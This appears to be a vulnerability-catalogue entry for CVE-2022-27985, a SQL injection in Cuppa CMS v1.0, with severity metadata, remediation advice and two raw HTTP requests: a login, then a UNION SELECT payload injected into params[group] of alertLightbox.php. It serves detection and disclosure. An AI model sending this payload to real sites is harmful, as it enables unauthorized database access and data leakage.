| Title | Cuppa CMS v1.0 - SQL injection |
|---|---|
| Author | theamanrawat |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. |
| Remediation | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.24054 |
| CVE ID | CVE-2022-27985 |
| CWE ID | CWE-89 |
| Tags | cve cve2022 sqli cuppa authenticated cuppacms vuln |
CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.
POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
user=oHnIPr&password=nwOyTS&language=en&task=login
POST /alerts/alertLightbox.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Content-Length: 205
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
url=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile¶ms%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('9467'),null--+-¶ms%5Breference%5D=41&uniqueClass=new_content_3983163
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-27985.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-27985.pcap
N/AN/A